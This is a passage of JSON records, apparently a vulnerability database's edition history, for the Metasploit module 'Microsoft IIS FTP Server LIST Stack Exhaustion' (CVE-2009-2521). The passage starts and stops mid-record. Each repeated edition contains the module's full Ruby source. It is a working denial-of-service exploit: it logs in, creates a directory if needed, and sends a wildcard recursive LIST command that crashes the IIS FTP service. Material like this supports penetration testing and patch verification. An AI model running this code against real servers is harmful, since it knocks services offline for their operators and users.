03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-02-06T04:23:27", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-02-06T08:18:04", "history": [], "viewCount": 38, "enchantments": {"score": {"value": 2.6, "modified": "2018-02-06T08:18:04"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-02-06T08:18:04", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-02-06T16:22:11", "history": [], "viewCount": 38, "enchantments": {"score": {"value": 2.6, "modified": "2018-02-06T16:22:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-02-06T16:22:11", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-02-06T22:17:44", "history": [], "viewCount": 40, "enchantments": {"score": {"value": 2.6, "modified": "2018-02-06T22:17:44"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-02-06T22:17:44", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-02-20T00:59:37", "history": [], "viewCount": 40, "enchantments": {"score": {"value": 2.6, "modified": "2018-02-20T00:59:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-02-20T00:59:37", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-02-20T03:00:47", "history": [], "viewCount": 43, "enchantments": {"score": {"value": 2.6, "modified": "2018-02-20T03:00:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-02-20T03:00:47", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-02-26T11:05:28", "history": [], "viewCount": 43, "enchantments": {"score": {"value": 2.6, "modified": "2018-02-26T11:05:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-02-26T11:05:28", "differentElements": 